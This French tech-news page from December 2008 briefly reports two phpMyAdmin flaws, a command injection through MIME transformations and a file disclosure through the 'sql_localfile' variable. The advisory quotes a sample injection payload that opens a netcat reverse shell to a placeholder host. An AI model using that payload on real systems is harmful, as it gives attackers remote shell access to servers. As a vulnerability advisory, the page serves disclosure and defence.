phpMyAdmin Remote Command execution and File disclosure Vulnerabilities

Déposez votre CV gratuitement sur touslesemplois

» Logiciels

» Jeux vidéos

» Matériel Informatique

» ASP.NET

» ASP

» SQL

» PHP

» JAVASCRIPT

» XML

» ACTUALITÉ / DIVERS

» DROIT DE L'INTERNET

» INFOS VIRUS

» PATCHS MICROSOFT

» SÉCURITÉ

» BASES DE DONNÉES

» DOWNLOAD .NET

» LOGITHÈQUE

» SERVICES WEB

» Y SONT FOUS !

» .NET

» ASP

» ASP.NET

» JAVA

» PHP

» XML

» LANGAGE C#

» LANGAGE VB.NET

» UNIX / LINUX

» WINDOWS

» EVÈNEMENTS

» GASP

» MICROSOFT

Vous êtes ici : LES Z'ACTUS > PHP, SÉCURITÉ

phpMyAdmin Remote Command execution and File disclosure Vulnerabilities
Deux vulnérabilités ont été identifiées dans phpMyAdmin, elles pourraient être exploitées par un attaquant distant afin de compromettre un système vulnérable. Le premier problème se situe au niveau des transformations externes MIME, ce qui pourrait permettre l'injection de commandes arbitraires (ex : F\';nc -e /bin/sh $IP 80;echo \'A). La seconde vulnérabilité se situe au niveau du mécanisme UploadDir et read_dump.php qui ne filtrent pas correctement la variable "sql_localfile", ce qui pourrait permettre l'accès à des fichiers arbitraires.

02/12/2008 - Voir l'article complet

ABONNEZ-VOUS GRATUITEMENT A LA REVUE DE PRESSE "LES Z'ACTUS" ET RECEVEZ CHAQUE JOUR DANS VOTRE BOITE AUX LETTRES LA MEILLEURE INFORMATION DEDIEE AUX WEBMASTERS / DEVELOPPEURS.

Indiquez votre adresse E-mail :

Actualité(s) similaire(s) :

» Les services Live de Microsoft font le bonheur des spammeurs

» Zend Framework 1.7 : ouverture vers Adobe Flex

A RETENIR CETTE SEMAINE

01/12/2008 - Windows Live ID devient un fournisseur OpenID : ce que les développeurs doivent savoir
Kader Yildirim nous propose la traduction d'un article de Jorgen Thelin pour comprendre la portée de ...

01/12/2008 - Les méthodes Agiles sur le déclin ?
C'est le buzz de la semaine. Entre SlashDot qui titre "When Agile Projects Go Bad", Artima reprenant ...

28/11/2008 - Les Microsoft Days... des moments inoubliables en région !
Les Microsoft Days ont rencontré un grand succès... et il est facile de comprendre pourquoi en regar ...

27/11/2008 - Ajoutez la possibilité de vous contacter via Windows Live Messenger sur vos blogs ou sites web
David Rousset vous propose une astuce tout simplement géniale pour donner la possibilité à vos lecte ...

27/11/2008 - Microsoft Days - Toutes les présentations sont à télécharger !
Retrouvez dès à présent les présentations de toutes les sessions jouées durant les Microsoft Days... ...

26/11/2008 - ASP.NET supporté sur Windows Server Core 2008 R2
Information intéressante que je vous partage, et que j’en profite pour me noter mentalement pour une ...

26/11/2008 - Création d'un Workflow State-Machine pour Sharepoint
Vous souhaitez créer un workflow « machine à états » pour Windows SharePoint Services, avec Visual S ...